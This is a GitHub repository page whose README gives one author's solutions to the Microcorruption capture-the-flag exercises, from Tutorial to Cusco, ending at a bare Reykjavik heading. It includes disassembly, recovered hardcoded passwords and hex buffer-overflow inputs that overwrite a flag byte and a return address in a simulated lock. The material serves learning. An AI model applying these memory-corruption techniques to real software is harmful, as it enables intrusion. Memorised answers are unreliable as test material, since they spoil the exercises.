felixm
/
microcorruption
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
My solutions to the fantastic Microcorruption exercises.
2 Commits
1 Branch
0 Tags
98 KiB
Python 88.1%
C 11.9%
 
 
Go to file
Felix Martin 69755b72aa Document exercises Tutorial till Hanoi 2023-01-21 13:20:59 -05:00
LICENSE Initial commit 2023-01-21 18:30:32 +01:00
README.md Document exercises Tutorial till Hanoi 2023-01-21 13:20:59 -05:00

README.md

microcorruption

My solutions to the fantastic Microcorruption exercises.

Tutorial

Code that compares the password to the expected length of 8 characters.

4484:  6e4f           mov.b	@r15, r14
4486:  1f53           inc	r15
4488:  1c53           inc	r12
448a:  0e93           tst	r14
448c:  fb23           jnz	$-0x8 <check_password+0x0>
448e:  3c90 0900      cmp	#0x9, r12
4492:  0224           jz	$+0x6 <check_password+0x14>

Any eight characters input is valid, for example:

password

New Orleans

Password is hardcoded and located at address 0x2400.

2400: 764f 7050 6e4b 5300 0000 0000 0000 0000   vOpPnKS.

Solution:

vOpPnKS

Sydney

The password is hardcoded in the check_password routine:

448a <check_password>
448a:  bf90 4f78 0000 cmp	#0x784f, 0x0(r15)
4490:  0d20           jnz	$+0x1c <check_password+0x22>
4492:  bf90 3b77 0200 cmp	#0x773b, 0x2(r15)
4498:  0920           jnz	$+0x14 <check_password+0x22>
449a:  bf90 2b74 0400 cmp	#0x742b, 0x4(r15)
44a0:  0520           jnz	$+0xc <check_password+0x22>
44a2:  1e43           mov	#0x1, r14
44a4:  bf90 5d2f 0600 cmp	#0x2f5d, 0x6(r15)
44aa:  0124           jz	$+0x4 <check_password+0x24>

Solution (hex, byte ordering is little endian):

4f783b772b745d2f

ASCII equivalent:

Ox;w+t]/

Hanoi

The input password does not matter. Instead, there is a hardcoded comparison of 0xb with the value at 0x2410.

4552:  3f40 d344      mov	#0x44d3 "Testing if password is valid.", r15
4556:  b012 de45      call	#0x45de <puts>
455a:  f290 0b00 1024 cmp.b	#0xb, &0x2410
4560:  0720           jnz	$+0x10 <login+0x50>
4562:  3f40 f144      mov	#0x44f1 "Access granted.", r15
4566:  b012 de45      call	#0x45de <puts>
456a:  b012 4844      call	#0x4448 <unlock_door>

The input password is stored at 0x2400, so we can input a long enough string to set 0x2410 to 0xb. Solution in hex:

16 bytes from 0x2400 to 0x240f
                              \
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb0b
                                --
             set 0x2410 to 0xb /

Cusco

At the end of the login function the stackpointer points to 0x43fe. The input password is allocated to 0x43ee. That means we can override the return address at 0x43fe with the address of the unlock_door door function at 0x4446.

Solution in hex:

16 bytes from 0x43ee to 0x43fe
                              \
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb4644
                                ----
                               /
                               set 0x43fe to 0x4644 (unlock_door)

Reykjavik